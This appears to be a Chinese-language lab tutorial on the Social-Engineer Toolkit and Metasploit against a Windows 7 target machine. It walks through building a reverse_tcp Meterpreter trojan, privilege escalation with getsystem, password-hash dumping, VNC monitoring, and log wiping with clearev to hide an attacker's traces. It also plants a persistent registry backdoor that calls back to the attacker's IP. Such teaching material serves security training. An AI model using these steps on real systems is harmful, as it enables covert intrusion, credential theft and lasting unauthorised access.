SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制。
生成木马并上传到靶机
1. set
2. 选择1,社会工程学攻击
3. 选择4,创建攻击载荷和监听器
4. 选择2,攻击模式选择reverse_tcp meterpreter
5. 输入ip地址(监听的主机ip,kali的ip地址)和端口(随机,只要不被占用即可)
默认生成木马地址;root/.set
将木马上传到靶机
执行木马操控主机
双击执行木马查看结果
激活 Meterpreter 会话获得 Shell 后即可操控 Win 7 靶机如下图所示
sessions -i 1
操纵主机
可输入help命令查看 Meterpreter 支持的所有攻击命令和描述
截图效果
执行getsystem进行提权攻击
获取密码(windows的密码其实就是藏在一个目录下的hash值)
执行命令hashdump尝试获取系统所有账户的密码的hash值发现失败没关系可以执行Meterpreter 提供的脚本
远程监控win7
run vnc
进一步的攻击还可以执行background将当前会话转移到后台执行达到后台进程切换的目的。
日志清除
为了不暴露攻击者的痕迹行为需要清除系统事件
先打开 Windows 事件查看器查看清理之前的日志记录
win + r输入eventvwr
在 Meterpreter 执行命令 clearev 命令,对靶机的日志进行清除
注意如果不小心ctrl+Z退出了控制台可以通过如下命令恢复
jobs fg %jobnumber是命令编号不是进程号
如果不小心退出了msf的会话重新打开setoolkit设置相同的ip和端口即可恢复
2.4.4 创建后门
当成功获取目标系统的访问权限后需要寻找方法来恢复与目标主机的连接而无需再进入目标系统。
创建持久后门之前先查看下它的帮助文件如下所示
run persistence -h
2. 执行命令创建一个持久后门输出的信息将显示创建后门的一个过程。Kali 将在目标系统中创建了一个持久脚本
(保存在C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs)并篡改注册表如下所示
run persistence -X -i 5 -p 9000 -r 192.168.145.98(kali渗透机的ip)
3. 查看 Win 7 靶机的注册表和系统文件
4. 为了验证后门是否可利用关闭当前攻击会话重启 Win 7 虚拟机
此时在 Kali 虚拟机重新开启一个终端运行 MSF 框架;监听 Win 7 虚拟机是否重启后能自动上线获得攻击会话
至此后门植入成功以后只要Win 7系统开机便会自动运行后门脚本攻击者可以随时入侵,除非受害主机的管理员发现后删除了注册表相应的键值和系统中植入的后门脚本。
此时即使 Win 7 靶机中的远控木马文件 payload.exe 被管理员删除也没关系;只不过功能受限。
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有